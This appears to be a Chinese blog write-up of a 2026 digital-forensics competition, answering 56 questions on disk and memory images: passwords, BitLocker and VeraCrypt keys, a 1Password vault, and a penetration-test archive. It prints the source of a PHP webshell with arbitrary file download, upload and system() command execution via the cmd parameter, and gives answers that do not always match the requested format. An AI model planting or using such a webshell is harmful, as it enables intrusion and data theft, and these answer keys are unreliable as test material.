1. 分析刘洋liuyang_pc.E01检材,提取磁盘镜像SHA1值的前6位?[答案格式:字母小写]

5bc418

2. 分析刘洋liuyang_pc.E01检材,计算机系统Build版本为?[答案格式:19000]

26100

3. 分析刘洋liuyang_pc.E01检材,计算机最后一次正常关机的时间为?UTC +0[答案格式:2025-05-06-09:00:00]

2026-04-20-16:25:35

utc+0,所以要-8小时

4. 分析刘洋liuyang_pc.E01检材,计算机网卡的MAC地址为?[答案格式:00-0B-00-A0-00-00]

5. 分析刘洋liuyang_pc.E01检材,分析机主是从那里下载的typora?[答案格式:阿里云]

蓝奏云

6. 分析刘洋liuyang_pc.E01检材,刘洋在2026-04-19 13:46:01(UTC +0)曾访问过百度云盘,请给云盘的打开密码?[答案格式:11aa]

48gy

7. 分析刘洋liuyang_pc.E01检材,请给出刘洋管理pve集群所用的端口号?[答案格式:8000]

8006

8. 分析刘洋liuyang_pc.E01检材,请给出刘洋登录理财网站所使用的密码?[答案格式:password]

admin123

9. 分析刘洋liuyang_pc.E01检材,请给出理财网站的IP地址?[答案格式:127.0.0.1]

192.168.0.70

来到host文件,能看到理财网站是由192.168.0.70本地映射的

ps:我是做完了服务器之后来复盘的这个,所以能直接知道是192.168.0.70

10. 分析刘洋liuyang_pc.E01检材,请给出计算机内Bitlocker加密分区恢复密钥的前6位?[答案格式:6位数字]

560615-577522-342881-216865-242561-312356-584837-421597

检材中是有内存镜像文件的,用efdd:先提取key,用内存镜像

输出成一个evk文件

然后再把计算机镜像放进去解密(用上面的密钥文件)(选中bitlocker加密分区)

这个时候就有bitlocker加密恢复密钥了

11. 分析刘洋liuyang_pc.E01检材,找出VC加密容器的密钥文件,给出该密钥文件的绝对路径?[答案格式:D:\ABC\123\测试.txt]

D:\BaiduNetdiskDownload\无标题.png

文件C:/Users/刘洋/Pictures/Screenshots/屏幕截图(2).png

看picture当中的图片这里有些1080的高度,转到这个图片,发现高只有680像素,所以宽高修复一下

发现是vc密钥文件

12. 接上题,该VC加密容器的密钥文件的图像高度是多少像素?[答案格式:1345]

1080

题目中应该加一个“原始”不容易错;上面能看得出来

13. 分析刘洋liuyang_pc.E01检材,请给出团队重要信息加密保存的软件名?[答案格式:abc123]

“C:\Users\刘洋\Downloads\1Password`1Password`.exe”

后面几题都是围绕这个来的

14. 分析刘洋liuyang_pc.E01检材,该软件的保险库文件名为什么?[答案格式:abc.abc]

“C:\Users\刘洋\Documents\1password`liuyang.opvault`”

15. 分析刘洋liuyang_pc.E01检材,该软件的保险库文件打开密码是什么?[答案格式:124@password]

liuyang@6419

在下载文件夹中有一个和加密软件同名的rar能看到相关加密逻辑

“C:\Users\刘洋\Documents\1password\liuyang.opvault”

把里面的js文件拿出来爆破

16. 分析刘洋liuyang_pc.E01检材,请给出用户刘洋的开机密码?[答案格式:p@ssw0rd123]

6yang@2o26

17. 分析刘洋liuyang_pc.E01检材,请给出pve服务器的管理密码?[答案格式:p@ssw0rd123]

admin123

18. 分析刘洋liuyang_pc.E01检材,找出计算机内的脚本加密工具,给出该加密工具的SHA1的前6位?[答案格式:字母小写]

7860dc719e0bd9fddc2eafd6708ecf204d744ae7

这里我们已经拿到两个vc的密码了,所以极有可能是双层容器(上面这张图片中pgscup的md5值是21题开始的那层容器)

在bitlocker加密分区中的这个3g的文件一眼vc容器

这个时候拿

这个文件作为密钥文件+pim = 2026解密vc容器 能看到以下信息

能看到encrypt_tool.py

ps:做完服务器也能知道是这个文件

19. 分析刘洋liuyang_pc.E01检材,该脚本加密工具在进行脚本加密时,最后一层是进行什么操作?[答案格式:字符替换]

十六进制转换

20. 分析刘洋liuyang_pc.E01检材,请解密该脚本加密工具加密的文件database.php.obf,给出该文件内的数据库密码?[答案格式:p@ssw0rd123]

pgscup@o26

下面那个passwd是备份密码,别弄错了

21. 分析刘洋liuyang_pc.E01检材,找出刘洋计算机内的交易信息.rar,给出该文件的打开密码?[答案格式:p@ssw0rd123]

pgscup@9541

22. 分析刘洋liuyang_pc.E01检材,找出刘洋计算机内刘桂荣的sf/z号码?[答案格式:5106***071131(公众号过审/故打码)]

hyw,有三个…

正常情况出题不会有这个问题,出题人可能没看过

23. 分析刘洋ly-memdump.mem镜像,给出用户刘洋的NT哈希值?[答案格式:数字字母组合,字母小写]

876dfe7bd78730b7b0baaf451414de8e

24. 分析刘洋ly-memdump.mem镜像,给出1Password密码管理器的数据库文件名?[答案格式:123ABc.abc]

1Password10.sqlite

25. 分析刘洋ly-memdump.mem镜像,1Password在VeraCrypt启动后约多少分钟启动?[答案格式:123]

2

差不多2分钟

26. 分析黄志远PC.E01镜像,黄志远使用的ai agent的名称是什么?[答案格式:www]

hermes

27. 分析黄志远PC.E01镜像,黄志远使用的模型api后4位是什么?[答案格式:abcd]

api_key: sk-dfesagheoghjopghjihgioa

28. 请分析黄志远PC.E01镜像中的渗透.rar文件,分析黄志远PC.E01镜像,黄志远总共攻击了多少台主机?[答案格式:123]

直接搜索渗透 能搜出来渗透rar及其密码,解压渗透密码能发现几百张图片,这里参考了这篇文章

Montage+gaps拼图(详细)_montage拼图-CSDN博客

第一步:先把碎片整体铺开观察

直接逐张看 500 个碎片没有意义,先把它们铺成一张接触表,快速判断题目内容。

Linux 侧在你同步的目录下执行:

cd /mnt/hgfs/E/电子取证/2026盘古石初赛/渗透密码/渗透密码
montage patch_*.png -tile 25x20 -geometry +0+0 contact_25x20.png

得到的总览图如下:

白底面积过大,意味着很多碎片边缘代价会非常接近,直接拼会有大量歧义。

第二步:提取“信息量高”的碎片

为了避免被纯白块干扰,我先统计每张图的非白色像素数量,把信息量高的碎片单独拿出来看。

高信息碎片总览如下:

这一步的作用是确认:

  • 主体人物确实集中在一部分碎片里
  • 文字线索主要也集中在这些碎片里
  • 题目不是随机彩图,而是“白底人物+文字”的结构图

第三步:判断拼图版式

虽然有 500 张碎片,但原始大图到底是:

  • 20 x 25
  • 还是 25 x 20

需要实际试。

因为 gaps 默认更适合正方形拼块,我先把所有 30 x 41 的原图碎片缩放成 41 x 41 的方块版本:

from pathlib import Path
from PIL import Image

root = Path('.')
out = root / 'gaps_square_41'
out.mkdir(exist_ok=True)

for f in sorted(root.glob('patch_*.png')):
    im = Image.open(f)
    im = im.resize((41, 41), Image.BICUBIC)
    im.save(out / f.name)

然后分别生成两种随机铺图:

第四步:低代数试跑,先判断哪种版式更合理

这里没有直接安装成系统命令,而是把 gaps 仓库拉到本地后,通过 PYTHONPATH 方式直接运行。原因是 Windows 本地 Python 3.13 下,按 pip install . 安装时会卡在 numpy==1.24 构建问题上,但源码直接运行没问题。

试跑命令如下:

$env:PYTHONPATH='C:\Users\jerry\AppData\Local\Temp\codex-gaps'
python -m gaps.cli run puzzle_20x25.png solved_20x25_g3_p60.png --size=41 --generations=3 --population=60
python -m gaps.cli run puzzle_25x20.png solved_25x20_g3_p60.png --size=41 --generations=3 --population=60

20 x 25 试跑结果:

25 x 20 试跑结果:

对比后可以看出:

  • 25 x 20 版式更接近正确结果
  • 人物五官、上身、衣摆连接更自然
  • 左侧红字位置也更合理

所以后续固定使用 25 x 20

第五步:提高代数继续求解

确定版式后,再提高代数和种群规模,让 gaps25 x 20 上继续优化:

$env:PYTHONPATH='C:\Users\jerry\AppData\Local\Temp\codex-gaps'
python -m gaps.cli run puzzle_25x20.png solved_25x20_g10_p120.png --size=41 --generations=10 --population=120

得到的正方形求解结果如下:

这时主体人物已经基本成形:

  • 头部与五官基本对齐
  • 双手与武器位置明显正确
  • 下半身衣摆已大体连续

但因为背景有太多纯白碎片,所以周围文字和边角区域仍存在错位。

第六步:把结果映射回原始长方形碎片

由于求解时用的是 41 x 41 的方块版本,所以最后还要把排好的顺序映射回原始 30 x 41 的碎片。

做法是:

  • gaps_square_41 中每张方块图的内容计算哈希
  • 在求解结果中按格切出每个 41 x 41 小块
  • 根据哈希找到对应原始 patch_xxx.png
  • 用原始 30 x 41 图重新拼接

最终得到还原比例后的结果图:

这一版比方块图更适合观察文字,因为没有横向拉伸。

第七步:提取文字区域做进一步观察

为了确认图中线索,我又单独把红字区域裁出来放大:

左侧红字区域:

中部红字区域:

右侧红字区域:

目前比较清晰的文字线索是:

  • 左侧可辨识出:晚去杀鬼
  • 中部还有一个:

拼出来能看到密码是“今晚去杀鬼”;解开之后能看到渗透测试报告

16台

29. 请分析黄志远PC.E01镜像中的渗透.rar文件,反编译exploit二进制文件发现其调用了setuid()、setgid()和system(“/bin/bash”),该程序的源文件编译前名称是什么?[答案格式:xxx.c]

exploit.c

就是渗透下的这个exploit

30. 请分析黄志远PC.E01镜像中的渗透.rar文件,Webshell 功能逻辑研判观察 file_shell.php 的源码,若攻击者请求 ?download=/etc/passwd,程序执行的核心函数是什么?[答案格式:func()]

readfile()

<?php
if(isset($_GET['downlofad'])) {
    $file = $_GET['download'];
    if(file_exists($file)) {
        header('Content-Type: application/octet-stream');
        header('Content-Disposition: attachment; filename="'.basename($file).'"');
        readfile($file);
        exit;
    }
}

...

readfile() 是 PHP 专门用于文件下载的函数,它会直接读取文件内容并写入输出缓冲区,无需手动打开 / 关闭文件句柄,也不需要将整个文件加载到内存中。

31. 请分析黄志远PC.E01镜像中的渗透.rar文件,Nikto扫描结果发现通过发送超长斜杠序列可以探测目录列举漏洞,该漏洞对应的CVE编号是什么?[答案格式:CVE-XXXX-XXXX]

CVE-2002-1078

32. 请分析黄志远PC.E01镜像中的渗透.rar文件,SQLite 数据库结构分析在 users 表的定义中,id 字段使用了 AUTOINCREMENT。这意味着什么?[答案格式:SQL_KEYWORD]

AUTOINCREMENT

文件头里面有写(这道题的题目出的何意味…)

33. 请分析黄志远PC.E01镜像中的渗透.rar文件,Webshell 命令执行参数若要利用 file_shell.php 获取当前系统的用户权限,正确的 URL 参数构造是什么?[答案格式:cmd=xxx]

...

if(isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>
<form method="post" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit" value="Upload">
</form>
<form method="get">
<input type="text" name="cmd" placeholder="Command">
<input type="submit" value="Execute">
</form>

参数名是 **cmd**,通过 GET 传递,**system()** 执行命令。获取当前用户:Linux: **cmd=id**

34. 请分析黄志远PC.E01镜像中的渗透.rar文件,API 端口风险判定8000端口运行的技术组件是什么?[答案格式:XxxYyy]

FastApi

“渗透\通讯录管理系统漏洞清单.md”

35. 请分析黄志远PC.E01镜像中的渗透.rar文件,数据库存储安全性评估users 表的密码存储存在什么安全隐患?[答案格式:CVE-XXXX-XXXX]

CVE-2026-0005

36. 请分析黄志远PC.E01镜像中的渗透.rar文件,文件上传漏洞利用条件利用 upload.php 上传漏洞后,攻击者利用 Webshell 前最关键的一步是什么?[答案格式:xxx/]

**uploads/**

37. 请分析黄志远PC.E01镜像中的渗透.rar文件,根据通讯录管理系统漏洞清单,CVE-2026-0003(无限制文件上传漏洞)的CVSS评分是多少?[答案格式:1.2]

8.8

38. 请分析黄志远PC.E01镜像中的渗透.rar文件,根据file_shell.php源码,文件上传功能使用哪个PHP函数将临时文件移动到目标路径?[答案格式:php_func]

**move_uploaded_file**

39. 请分析黄志远PC.E01镜像中的渗透.rar文件,Web 目录遍历隐患uploads/ 目录启用目录列表功能通常由哪个组件控制?[答案格式:apache_opt]

indexes

Apache 的 **Options Indexes** 指令控制目录列表功能

40. 请分析黄志远PC.E01镜像中的渗透.rar文件,敏感凭据深度关联在 address_book.db 中,管理员密码 Str0ngP@ssw0rd2026! 是什么角色?[答案格式:SQL_DEFAULT](暂无答案)

他问的是管理员密码,所以应该是admin(存疑)

41. 请分析黄志远PC.E01镜像中的渗透.rar文件,数据规模与风险评估遭受泄露的个人联系人信息条数大约为多少?[答案格式:12345]

15000

42. 请分析黄志远PC.E01镜像中的渗透.rar文件,系统运行权限分析Web服务器运行的用户身份是什么?[答案格式:xxx-xxx]

www-data

43. 请分析黄志远PC.E01镜像中的渗透.rar文件,命令行注入漏洞识别验证 tools.php 命令执行漏洞时,哪个命令返回了uid的值?[答案格式:cmd]

id

44. 请分析黄志远PC.E01镜像中的渗透.rar文件,数据库物理路径获取攻击者通过 generate_data.php 得知数据库在服务器上的绝对物理路径是什么?[答案格式:/xxx/xxx/xxx.db]

/var/www/html/address_book.db

45. 请分析黄志远PC.E01镜像中的渗透.rar文件,Webshell 下载参数逻辑源码中通过设置哪个 Header 实现浏览器自动弹出下载框?[答案格式:Content-xxx]

Content-Disposition

46. 请分析黄志远PC.E01镜像中的渗透.rar文件,身份验证策略评估系统中存在的弱密码策略漏洞不包括哪项?[答案格式:user/pass]

admin/Str0ngP@ssw0rd2026! 是通过 generate_data.php 泄露出来的管理员凭据,不是“弱密码策略漏洞”条目中列出的默认弱口令项。因此按 user/pass 格式应填: admin/Str0ngP@ssw0rd2026!

47. 请分析黄志远PC.E01镜像中的渗透.rar文件,API 环境交互日志价值未授权访问8000端口日志接口,最可能导致哪类敏感信息泄露?[答案格式:/api/xxx]

http://192.168.61.135:8000/api/logs

48. 请分析黄志远PC.E01镜像中的渗透.rar文件,攻击路径逻辑推演攻击者获取持久访问权限的最典型方式是什么?[答案格式:xxx.php]

file_shell.php

结合报告信息和上面对该php的分析

49. 请分析黄志远PC.E01镜像中的渗透.rar文件,漏洞 CVE 编号识读被标识为未授权命令执行漏洞的虚拟CVE编号是什么?[答案格式:CVE-XXXX-XXXX]

CVE-2026-0002

50. 请分析黄志远PC.E01镜像中的渗透.rar文件,系统修复优先级研判24小时紧急加固中,哪项不属于立即修复级别?[答案格式:ABC]

WAF

51. 请分析黄志远PC.E01镜像中的渗透.rar文件,管理员凭据有效性验证利用管理员密码,攻击者在哪个页面时才能生效?[答案格式:xxx.php]

tools.php

52. 请分析黄志远PC.E01镜像中的渗透.rar文件,本系统使用的后端数据库技术是什么?[答案格式:DB_name]

SQLite

53. 请分析黄志远PC.E01镜像中的渗透.rar文件,Webshell 目录处理逻辑文件上传功能中,源码将上传后的文件命名为什么?[答案格式:$_xxx]

$_FILES

54. 请分析黄志远PC.E01镜像中的渗透.rar文件,目标系统运行的 Apache 具体版本号是什么?[答案格式:x.x.xx]

2.4.66

55. 请分析黄志远PC.E01镜像中的渗透.rar文件,根据通讯录管理系统漏洞清单,CVE-2026-0001(敏感信息泄露漏洞)的CVSS评分是多少?[答案格式:1.2]

9.8

56. 请分析黄志远PC.E01镜像中的渗透.rar文件,攻击者最终获取了什么角色的权限?[答案格式:xxx-xxx]

www-data

吐槽:渗透rar部分主要会卡在渗透密码部分;然后后面出的题像ai出的,而且加了顺序混淆,部分题感觉是选择题改的

Logo

DAMO开发者矩阵,由阿里巴巴达摩院和中国互联网协会联合发起,致力于探讨最前沿的技术趋势与应用成果,搭建高质量的交流与分享平台,推动技术创新与产业应用链接,围绕“人工智能与新型计算”构建开放共享的开发者生态。

更多推荐